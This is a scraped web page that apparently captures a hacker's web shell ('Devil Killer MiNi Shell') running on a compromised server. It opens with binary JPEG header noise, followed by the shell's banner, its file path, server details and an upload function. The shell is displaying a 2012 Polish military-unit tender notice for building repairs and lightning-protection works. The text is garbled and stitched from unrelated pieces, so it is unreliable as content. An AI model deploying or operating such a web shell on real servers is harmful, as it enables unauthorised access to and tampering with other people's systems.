JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120524/171380-N-2012.html

<p class="kh_header"><b>Wędrzyn: WYKONANIE ROBÓT BUDOWLANYCH POLEGAJĄCYCH NA:
Część I:   wymiana stolarki okiennej i drzwiowej, roboty malarskie, częściowa wymiana instalacji elektrycznej w bud. nr 19 w JW. 5700 w m. Międzyrzecz
Część II:  naprawie elewacji, rynien i rur spustowych w bud. 68 w JW 5700 w m. Międzyrzecz
Część III: wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Nietoperek w JW 5700 w m. Międzyrzecz
Część  IV: wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Wojciechowo w JW 5700 w m. Międzyrzecz
Część V: naprawa elewacji, roboty malarskie i posadzkowe w bud. nr 40 i 69 w JW 5700</b><br>
<b>Numer ogłoszenia: 171380 - 2012; data zamieszczenia: 24.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE ROBÓT BUDOWLANYCH POLEGAJĄCYCH NA:
Część I:   wymiana stolarki okiennej i drzwiowej, roboty malarskie, częściowa wymiana instalacji elektrycznej w bud. nr 19 w JW. 5700 w m. Międzyrzecz
Część II:  naprawie elewacji, rynien i rur spustowych w bud. 68 w JW 5700 w m. Międzyrzecz
Część III: wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Nietoperek w JW 5700 w m. Międzyrzecz
Część  IV: wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Wojciechowo w JW 5700 w m. Międzyrzecz
Część V: naprawa elewacji, roboty malarskie i posadzkowe w bud. nr 40 i 69 w JW 5700.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na:

Część I:   wymiana stolarki okiennej i drzwiowej, roboty malarskie, częściowa wymiana instalacji elektrycznej w bud. nr 19 w JW. 5700 w m. Międzyrzecz
Zakres przedmiotu zamówienia:
a) roboty rozbiórkowe 
- demontaż okien, drzwi wewnętrznych, 
- demontaż posadzek z tworzyw sztucznych, płytek ceramicznych, cementowych (lastryko), 
- demontaż okładzin ściennych z płytek ceramicznych, 
- skucie tynków wewnętrznych, 
- rozebranie ścianek działowych, 
- rozebranie podłoża z betonu, 
- demontaż osprzętu sanitarnego, tablic bezpiecznikowych,
- wywóz i utylizacja gruzu,
b) roboty budowlane:
- montaż stolarki okiennej PCV,
- montaż podokienników, 
- montaż ościeżnic, drzwi, 
- budowa ścianek działowych, 
- tynkowanie, 
- wykonanie wylewek betonowych, warstwy wyrównawczej i samopoziomującej, 
- uszczelnienia pomieszczeń mokrych, 
- montaż okładzin ściennych, posadzki z płytek ceramicznych, 
- montaż wykładziny z tworzyw sztucznych, 
- szlifowanie i lakierowanie parkietów, 
- przygotowanie do malowania, gruntowanie i malowanie ścian i sufitów, grzejników, rur, 
- montaż ścianek ustępowych,
c) roboty sanitarne:
- montaż kabin natryskowych, umywalek, bidetów i ustępów wraz z armaturą, 
- przebudowa rur kanalizacyjnych i wodociągowych,
d) roboty elektryczne:
- montaż przewodów p/t, w rurach, 
- montaż rozdzielnic elektrycznych, 
- montaż opraw, 
- montaż osprzętu.

Część II - naprawa  elewacji, rynien i rur spustowych w bud. 68 w JW 5700 w m.Międzyrzecz
Zakres przedmiotu zamówienia:
a) roboty dekarskie:
- demontaż rur spustowych
- obróbki z blachy stalowej, 
- montaż rur spustowych,
b) roboty budowlane:
- demontaż części betonowych parapetów,
- montaż parapetów,
- odbicie luźnych fragmentów tynków zewnętrznych,
- uzupełnienie tynków zewnętrznych,
- położenie tynku strukturalnego,
- malowanie elementów stalowych, betonowych,
c) roboty elektryczne:
- uzupełnienie brakujących wsporników instalacji odgromowej na dachu.

Część III - wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Nietoperek w JW 5700 w m. Międzyrzecz
Zakres przedmiotu zamówienia:
a) roboty przygotowawcze:
- opracowanie dokumentacji projektowej na wykonanie instalacji odgromowej,
b) roboty ziemne:
- wykonanie i zasypanie wykopów liniowych,
c) roboty elektryczne:
- wykonanie instalacji odgromowej, 
- wykonanie linii zasilających, 
- montaż opraw oświetleniowych, 
- montaż grzejnika elektrycznego, 
- montaż złącza kablowego.

Część IV - wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Wojciechowo w JW 5700 w m. Międzyrzecz
Zakres przedmiotu zamówienia:
a) roboty przygotowawcze:
- opracowanie dokumentacji projektowej na wykonanie instalacji odgromowej,
b) roboty ziemne:
- wykonanie i zasypanie wykopów liniowych,
c) roboty elektryczne:
- wykonanie instalacji odgromowej, 
- wykonanie linii zasilających, 
- montaż opraw oświetleniowych, 
- montaż grzejnika elektrycznego, 
- montaż złącza kablowego,
- wymiana rozdzielnicy elektrycznej.

Część V - naprawa elewacji, roboty malarskie i posadzkowe w bud. nr 40 i 69 w JW 5700 w m. Międzyrzecz
Zakres przedmiotu zamówienia:
a) roboty rozbiórkowe:
- odbicie luźnych fragmentów tynków zewnętrznych, 
- rozebranie naświetli z pustaków szklanych, 
- rozbiórka spękanych fragmentów posadzek betonowych, 
- wywiezienie i utylizacja gruzu,
b) roboty posadzkowe:
- wykonanie posadzki betonowej, 
- wzmocnienie obrzeża kanału kątownikiem, 
- przykrycie otworu kanału balami drewnianymi,
c) roboty budowlane:
- uzupełnienie tynków zewnętrznych, 
- położenie tynku strukturalnego, 
- montaż naświetli z PCV, 
- wykonanie tynków wewnętrznych, 
- malowanie tynków wewnętrznych, 
- czyszczenie i malowanie konstrukcji stalowych, wentylatorów dachowych.

Szczegółowy opis przedmiotu zamówienia określono w Specyfikacji technicznego wykonania i odbioru robót budowlanych stanowiący (załącznik nr 2 do SIWZ).

Istnieje możliwość przeprowadzenia wizji lokalnej terenu robót po wcześniejszym uzgodnieniu telefonicznym  pod numerem  (95)  755 6465 z Panem Edwardem Sawickim.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8, 45.40.00.00-1, 45.30.00.00-0, 45.45.30.00-7, 45.44.30.00-7, 45.31.23.11-0, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	złożą oświadczenie o spełnianiu warunków określone w art. 44 ustawy Prawo zamówień publicznych oraz o braku podstaw  do wykluczenia - art. 22 ust.1 oraz art. 24 ust. 1 Pzp (wg wzoru zawartego w zał. nr 3, 4 do SIWZ);
2)	złożą kserokopię aktualnego odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; w przypadku osób fizycznych oświadczenie w zakresie art. 24 ust.1 pkt.2 tj., że  nie zachodzi w stosunku do nich przesłanka wykluczenia określona w tym artykule. Zamawiający  wyklucza z postępowania wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego;
3)	złożą  aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)	złożą  aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej trzy roboty na każdą część odpowiadające przedmiotowi zamówienia z tym, że dla:
Części I - o wartości min. 200.000 zł brutto
Części II- o wartości min. 100.000 zł brutto
Części III- o wartości min. 10.000 zł brutto
Części IV- o wartości min. 10.000 zł brutto
Części IV- o wartości min. 120.000 zł brutto

Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu  wykonanych robót o podobnym charakterze  i  dokumentów potwierdzających, że roboty te zostały prawidłowo ukończone; na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie osób zdolnych do wykonania zamówienia warunek zostanie spełniony na podstawie oświadczenia wykonawcy załącznik nr 5 do SIWZ, że osoby, które będą uczestniczyć w wykonywaniu zamówienia  posiadają aktualne zaświadczenie potwierdzające przynależność do właściwej Izby Samorządu Zawodowego oraz
posiadają wymagane uprawnienia tj.  uprawnienia budowlane do kierowania robotami o specjalności: 
dla części I:
- konstrukcyjno-budowlanej,
- instalacyjne w zakresie instalacji sanitarnych,
- instalacyjne w zakresie sieci, instalacji, urządzeń elektrycznych  i elektroenergetycznych,

dla części II
- konstrukcyjno-budowlanej,
             
              dla części III
-instalacyjne w zakresie sieci, instalacji, urządzeń elektrycznych                                        i  elektroenergetycznych oraz uprawnień do projektowania bez ograniczeń w tym   samym zakresie

dla części IV
-instalacyjne w zakresie sieci , instalacji, urządzeń elektrycznych                                   i elektroenergetycznych oraz uprawnień do projektowania bez ograniczeń w tym   samym zakresie

dla części V:
- konstrukcyjno-budowlanej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej warunek zostanie spełniony, jeżeli             
Wykonawca  posiada  opłaconą polisę ubezpieczeniową z obowiązku rzeczowego OC za wykonanie robot budowlanych obejmującą naprawy i szkody powstałe w czasie wykonania robót na gwarantowaną sumę ubezpieczenia w wysokości: 
- dla części I - minimum   250.000 zł
- dla części II- minimum  120. 000zł
- dla części III- minimum   20.000zł
- dla części IV- minimum   20.000zł
- dla części V-  minimum  150.000zł
Jeżeli Wykonawca podejmie się realizacji zadania w całości, tj. wykonania pięciu części  przedmiotu zamówienia, Zamawiający uzna warunek za spełniony jeżeli Wykonawca  posiada polisę ubezpieczeniową z obowiązku rzeczowego OC za wykonanie robót budowlanych obejmującą naprawy i szkody powstałe w czasie wykonania robót na gwarantowaną sumę ubezpieczenia w wysokości  560.000zł
 Ocena spełniania warunku będzie dokonana na podstawie złożonego dokumentu na zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru zamieszczonego w niniejszej SIWZ - Załącznik nr 1;
2) Oświadczenie o robotach podzleconych - załącznik nr 6 do SIWZ.
3) Kosztorys ofertowy jeden, bądź dla każdej części odrębny.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - termin wykonania - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 08:45, miejsce: Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn
bud. nr 33, pok. 211 Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wymiana stolarki okiennej i drzwiowej, roboty malarskie, częściowa wymiana instalacji elektrycznej w bud. nr 19 w JW. 5700 w m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
a) roboty rozbiórkowe 
- demontaż okien, drzwi wewnętrznych, 
- demontaż posadzek z tworzyw sztucznych, płytek ceramicznych, cementowych (lastryko), 
- demontaż okładzin ściennych z płytek ceramicznych, 
- skucie tynków wewnętrznych, 
- rozebranie ścianek działowych, 
- rozebranie podłoża z betonu, 
- demontaż osprzętu sanitarnego, tablic bezpiecznikowych,
- wywóz i utylizacja gruzu,
b) roboty budowlane:
- montaż stolarki okiennej PCV,
- montaż podokienników, 
- montaż ościeżnic, drzwi, 
- budowa ścianek działowych, 
- tynkowanie, 
- wykonanie wylewek betonowych, warstwy wyrównawczej i samopoziomującej, 
- uszczelnienia pomieszczeń mokrych, 
- montaż okładzin ściennych, posadzki z płytek ceramicznych, 
- montaż wykładziny z tworzyw sztucznych, 
- szlifowanie i lakierowanie parkietów, 
- przygotowanie do malowania, gruntowanie i malowanie ścian i sufitów, grzejników, rur, 
- montaż ścianek ustępowych,
c) roboty sanitarne:
- montaż kabin natryskowych, umywalek, bidetów i ustępów wraz z armaturą, 
- przebudowa rur kanalizacyjnych i wodociągowych,
d) roboty elektryczne:
- montaż przewodów p/t, w rurach, 
- montaż rozdzielnic elektrycznych, 
- montaż opraw, 
- montaż osprzętu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8, 45.40.00.00-1, 45.30.00.00-0, 45.45.30.00-7, 45.44.30.00-4, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> naprawa  elewacji, rynien i rur spustowych w bud. 68 w JW 5700 w m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
a) roboty dekarskie:
- demontaż rur spustowych
- obróbki z blachy stalowej, 
- montaż rur spustowych,
b) roboty budowlane:
- demontaż części betonowych parapetów,
- montaż parapetów,
- odbicie luźnych fragmentów tynków zewnętrznych,
- uzupełnienie tynków zewnętrznych,
- położenie tynku strukturalnego,
- malowanie elementów stalowych, betonowych,
c) roboty elektryczne:
- uzupełnienie brakujących wsporników instalacji odgromowej na dachu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin wykonania - 30</li>
</ul>
</li>
</ul><br>
